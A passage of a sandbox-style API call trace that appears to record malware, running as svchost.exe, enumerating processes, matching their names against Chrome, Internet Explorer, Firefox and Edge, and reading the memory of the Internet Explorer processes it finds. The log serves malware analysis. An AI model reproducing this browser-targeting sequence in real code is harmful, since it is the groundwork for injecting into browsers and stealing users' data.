	[0203.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.307] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.307] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0203.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.307] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.308] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0203.308] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x2574
	[0203.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.308] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0203.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.309] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.309] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0203.310] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.310] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.310] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0203.311] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x2578
	[0203.311] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.311] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0203.311] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.311] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.312] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.312] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0203.312] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.312] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.312] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0203.313] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x257c
	[0203.313] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.313] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0203.314] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.314] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.314] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.314] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0203.314] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.314] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.314] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0203.315] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x2580
	[0203.315] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.315] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0203.315] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.315] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.316] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0203.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.316] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.316] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0203.317] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x2584
	[0203.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.317] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0203.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.317] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.318] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0203.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.318] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.319] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0203.319] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x2588
	[0203.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.319] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0203.320] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.320] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.321] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0203.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.321] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.322] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0203.322] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x258c
	[0203.322] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.322] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0203.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.323] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.323] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0203.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.324] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.324] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0203.325] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x2590
	[0203.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.325] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0203.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.326] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.326] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0203.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.327] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.327] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0203.328] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x2594
	[0203.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.328] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0203.329] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.329] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.329] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.329] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0203.330] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.330] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.330] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0203.331] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x2598
	[0203.331] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.331] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0203.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.335] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0203.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.335] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0203.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.335] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.336] NtQueryInformationProcess (in: ProcessHandle=0x2598, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0203.336] ReadProcessMemory (in: hProcess=0x2598, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0203.336] ReadProcessMemory (in: hProcess=0x2598, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0203.336] ReadProcessMemory (in: hProcess=0x2598, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0203.336] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0203.336] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0203.337] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x259c
	[0203.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.337] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0203.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.337] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0203.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.337] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0203.338] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.338] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.338] NtQueryInformationProcess (in: ProcessHandle=0x259c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0203.338] ReadProcessMemory (in: hProcess=0x259c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0203.338] ReadProcessMemory (in: hProcess=0x259c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0203.338] ReadProcessMemory (in: hProcess=0x259c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0203.338] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0203.338] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0203.339] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x25a0
	[0203.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.339] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0203.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.340] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.340] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0203.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.340] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.340] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0203.341] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x25a4
	[0203.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.341] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0203.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.342] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.342] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0203.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.342] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.342] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.343] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x25a8
	[0203.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.343] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.344] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.344] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.344] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.344] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.345] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.346] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x25ac
	[0203.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.346] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.346] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.347] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.347] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.347] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0203.348] CloseHandle (hObject=0x188) returned 1
	[0203.348] Sleep (dwMilliseconds=0x64) 
	[0203.456] GetCurrentProcessId () returned 0x110
	[0203.456] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0203.461] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0203.463] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0203.465] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0203.466] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x25b0
	[0203.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.467] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0203.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.467] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.468] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0203.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.468] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.469] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0203.470] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x25b4
	[0203.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.470] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0203.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.470] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.470] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0203.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.471] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.471] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0203.472] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x25b8
	[0203.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.472] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0203.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.472] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.472] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0203.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.473] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.473] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0203.474] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x25bc
	[0203.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.474] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0203.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.474] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.474] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0203.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.475] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.475] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0203.475] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x25c0
	[0203.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.476] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0203.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.476] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.476] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0203.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.477] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.477] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0203.477] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x25c4
	[0203.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.478] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0203.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.478] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.478] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0203.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.479] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
